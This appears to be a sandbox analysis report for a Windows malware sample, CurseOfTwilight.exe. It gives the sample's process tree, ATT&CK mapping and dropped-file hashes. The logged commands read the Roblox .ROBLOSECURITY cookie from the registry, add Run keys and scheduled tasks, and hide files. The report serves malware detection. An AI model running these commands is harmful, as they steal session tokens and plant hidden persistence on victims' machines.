C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
PID:7632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"2⤵PID:8156
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupP0HaCU /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe /f"2⤵PID:4264
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupP0HaCU /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe /f3⤵
- Adds Run key to start application
PID:5972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupP0HaCU /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe\" /F /rl highest"2⤵PID:6376
-
C:\Windows\system32\cmd.execmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupP0HaCU /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe\" /F /rl highest3⤵PID:5460
-
C:\Windows\system32\schtasks.exeschtasks /create /sc onlogon /tn WindowsDriverSetupP0HaCU /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe\" /F /rl highest4⤵
- Creates scheduled task(s)
PID:2788
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe\"""2⤵PID:9232
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe\""3⤵
- Suspicious behavior: EnumeratesProcesses
PID:9308 -
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe4⤵
- Views/modifies file attributes
PID:6584
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\CurseOfTwilight.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""2⤵PID:10652
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "3⤵
- Suspicious behavior: EnumeratesProcesses
PID:10656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1224
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:1728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_P0HaCU /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_P0HaCU.vbs /f"2⤵PID:10668
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_P0HaCU /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_P0HaCU.vbs /f3⤵
- Adds Run key to start application
PID:5976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_P0HaCU.vbs\"""2⤵PID:7424
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_P0HaCU.vbs\""3⤵
- Suspicious behavior: EnumeratesProcesses
PID:6136 -
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_P0HaCU.vbs4⤵
- Views/modifies file attributes
PID:9072
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe"C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2628 --field-trial-handle=1652,i,10145686144927012465,2029700584885424378,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:5904
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
43KB
MD5252b4fda07550496d330d819f15ceb3e
SHA1650584312b310219a26d5fc20cb1804bb6c4dde5
SHA25639eafade0656a3c0bd723ad576b1f00a0d625ebeef80ac01f965165ffc28cf1d
SHA512a18529cc7325d3fce5fb5d32a63b74a8e2ff23a027c12fecdc111f14b1c601079512fce3ff5484a686aaa0dd1ea20083570707511541e4a6d7615053f3ffac49
-
Filesize
33KB
MD5c555604e8b6f818991e186342f856b1b
SHA13ae02db8eba2f4fa30cb7567a9f5bf8346faded0
SHA256012da30b247a7964a3bdaaaeec8a6fb5559d7047ab8f1bcc0a2a785aad978972
SHA51201a6c8f91d1eedd0d83b654059844aa7ed16e76abfce54183b5bf484edb6cb33e0ebe317987a3143e94c23ef60954ced0e32378a1a5f80f8412c7029e4303bbe
-
Filesize
1KB
MD5f0f11cd478cc44d518c16820ede9d253
SHA1cfaf8d2e071f2ade0894578e5b44e02032d27be4
SHA256321695dbcac7b2ceb14ef2651705ead5c0c42815358082b758ee803a37e945bb
SHA512ac736abf8a776918df4094929efc29f7ae643aeef8d9b464653e3b7272a0799e58dc961dacadfbf9f42f575dfba14df7e6f4b1256c2c83dfe333ffb2ed3a1de8
-
Filesize
5KB
MD52f0a6a34d9b95bba0e3358ddd41ff2ac
SHA1f39a9e7aeab9fe86fd9034284516de40186e6e93
SHA2566f575f1cac9f29b8f1f8a83a580811bdedeec88f9d4cb78ccecb553cba251ca5
SHA512a3c2094377b355a56d7d69f2a53baac58ebf3b40c5c031ba60fbc6f53e72e67e537e7bddee1489bbae4b41ea23311ad6b6f5c841e7b070dcdeca4bb8a6043084
-
Filesize
3KB
MD55d574dc518025fad52b7886c1bff0e13
SHA168217a5f9e9a64ca8fed9eefa4171786a8f9f8f7
SHA256755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2
SHA51221de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13
-
Filesize
1KB
MD5e4074ed39e5c69f858bb421aca1340ec
SHA103ea9c25f5bafd76bc776024ff46704296406a6a
SHA256398daf400c5f021e616a80156051067dc1301bef533e038790d8c0e81a6ed3c0
SHA512a735d55d7629777f8c98c555e5683858445bc01717c49e581ccff110a23458ea40208e4e8cbdee7394de26037be186ec12c9daeedc830119a635974b7d7328bf
-
Filesize
1KB
MD538285a40af0640d0296e043206aad30d
SHA146a830801ee7f66f2b5c52cab3f2b96e9cd39a34
SHA25672ac6797720489033fbb9316b2f675c1b4780450c070e535ad462be596405aba
SHA512c6ad7c07bae31e94f7ca07791f2b657882ea6b867c8ec6ed5404feb7d4e2452284bb762bc46f4c175ebb87ce2946f5c4c0ef3a0272fe53a7e8c1597740b6e3d5
-
Filesize
1KB
MD507990a7fccea877d78855cfac2e77acb
SHA1db2ee2b0627fa0104e8cd4611fb6a0fa693a6e75
SHA2569324b64d5d0bf35e4a5746b5f422ebe2fd21e1775e13ce56cd96a5cedb7b8968
SHA5129c35af2514b364769a3d219849a96691fdd8ec6849ecee1f83e0c5eb7662f636362bdd048d210fc40739af10ad7815e782523eedf0ce7760bc8d73863a39b93e
-
Filesize
1KB
MD570b26c3b6685b7e990384d394ec74652
SHA194f3bb48be15b711b53b5da0bc8a557e79a0ea3b
SHA256ca7a07c3ed7e449fccad52bd728bf0566b1264e998131bcf9d78fad99eb9c20d
SHA5126768131066b1a45e546f3528b66166470b6fd9138ec2a3cf1d9856078ee9c0aa5d3858794440ca3b6fa93f05ff8e3b0078fd7e22935085b2231a059d7c686386
-
Filesize
1KB
MD5b81698463008adf1ef84be81148f67a2
SHA163b8b9fef1c60e224999a7df8cbb86d9570789d4
SHA256317833f8b129ab3409489e6302b4c5284cbcc67afa87f858a1b5bc399345ebb1
SHA512a6f7b066859f8e0dbe1fe4b8b7cdfae1cde2b7392ae7574b2b5a2194e50379d64abf6be75fcbf89d606f4b2e797ffd1a46ceeb7bd1d72810367c86db6819d50f
-
Filesize
1KB
MD5c3cb16747ff61276392b488109c5260c
SHA15b9ed30601b2f7651523f46178b3f4cb1c3f6800
SHA256cca16e6157891aeb91befe39444e9e1d5b423085138ba48bfa7acdc7a5883f28
SHA512ef5ce9d067144855f36e1d0c6ad604d5d2d29d9729d58d7fc872788b2bc54cd3729b049158daa6442fe388eeae540ab50e38004a57d3a7e8df35fc84f3375079
-
Filesize
1KB
MD5d9dab0cd34fbe500203c74e7c45dbbd0
SHA160a003268e31b33334ac07bcf07db68bc7c13faf
SHA256036de6eb68e08828b88bbbe571fdef13750c1086a4bf51c589da8fdfcaa3ed17
SHA512e08c594dee4ba4c3397b7de9d24416f25d6ff0943b3fbd27905a0e9e0a2e32522ad7edff53ba9b9c7c697a4c84e1d858dde45efa8d1e32db132153b1ddf0884e
-
Filesize
1KB
MD58993d686f3d769cc5bfb6527cab46d24
SHA11b8c78ebc6f3d8d034a38f8596b8d5176550bea8
SHA256cad5244c55c634b5735c6d8d6a216b3e8e026d28f64d7cd6660326e001007d6c
SHA5123bd8646642be0561b115fab9eb58448b9dffd95ec9477eaede4e29cf9f1ad86be7671daaae6dd2f801bdaec0c1388dcdf25ee806acc86f35bfb215e230b1582c
-
Filesize
2KB
MD5590f88f1402d594e3c1112bf2e4a8b85
SHA1409c831b45408bd4316335e61fc2890779c40c32
SHA256615f39840c799a02d0be922a434a6559d4be0c4ebc110dcdb5028e4a784d66f4
SHA512205789a5fd3d1d7edf6a94ca831e25c5a3bc71b147b9bfc7bc971389d83652ec2b9e6e004bd460207fba6cb4bfba66b032b3f12979f33ed2b6965d5df17afb45
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
728B
MD5adcea074e6d3724782556be754ab1d24
SHA1f67393de938a2145817cd4baa62a93b5156fa7de
SHA25691a6cf0c45094628e4612f9fd837e6e09bab2b9c19e4314f1b5bf98fa6c607ac
SHA51254b53d931054dd6a360c8cf24b33a8f53ca455156a11da8c8e47c45d7d13ce660ee3acd7608b11209765df87b58c74eefe44b6326a3b920ff5e0192bfe75dde2
-
Filesize
4KB
MD5b755a84305c5e86277dbdb697768f70f
SHA1b1bfed42034d1f8cbcfa66daa3ccc78cd8ee8c68
SHA25658c52a5f5e0128cd62dbdcbf933e3f64c13f877e4ec5255f8991c3dac6a0f7b3
SHA5123428b9e4c7cb2015de8d7357c15bc18b6e6dd6c1230968f8fa9720f4bf7e54f6b3f00f85e1a30fecbd7d7022b6fed67f79dee4e288f379f2e78d1b987d0b7503
-
Filesize
10.7MB
MD5e3e481c4d8c2d4632c8ea7086ee004d1
SHA124ea269d62c1141b6f7e85ec359e8a28fea32fcc
SHA25636e71ee5cba0ca51af79c568fafebcddff71bb95138ca1f4942fc492d498e88a
SHA5122f0adefe7fad5bf79c63e875b1dd8e1a7532e03c13c99e767cdce2cde7dff335246ac2c227aba5cfbabcc2c46d28f68cc09800f63a39bd4fa9819075f2278f56
-
Filesize
130B
MD5d1111fbbaef28413de4a0a64e0d54f2d
SHA15bbadc5c5d504dcba5509d34986125e8446e3830
SHA256beed3a3f6edc1e1b73a3cafa55f16ba61d56c87b7506ae9c33eb630bcbaa3a01
SHA5121196efb8579efc91105000afaac0b6c14f386aa29a64ddd88f9a2d6a980bd2eb8dd6a2e78457eb9e5614f9492d0e75342f01293c1a8341b153357f2d64c64af0
-
Filesize
1.4MB
MD556192831a7f808874207ba593f464415
SHA1e0c18c72a62692d856da1f8988b0bc9c8088d2aa
SHA2566aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c
SHA512c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33
-
Filesize
154KB
MD5d9ca8449dee2f77b3c217c5de0bbc450
SHA1d22696acbe8e428f6e70168aff12d202e7e2b9c5
SHA256a1ab97d58849bd1baa44140340e5800590bbccc2f022e7bcea7d6837038fc0f2
SHA512cc480c1fc8647ceafd70c2f58e397de7c17b1e8b699e9cc3ce6ff81970ab4301f7a54a64abdb5eab37288d24c1682410d18a20d795683f50491042ff5aca91aa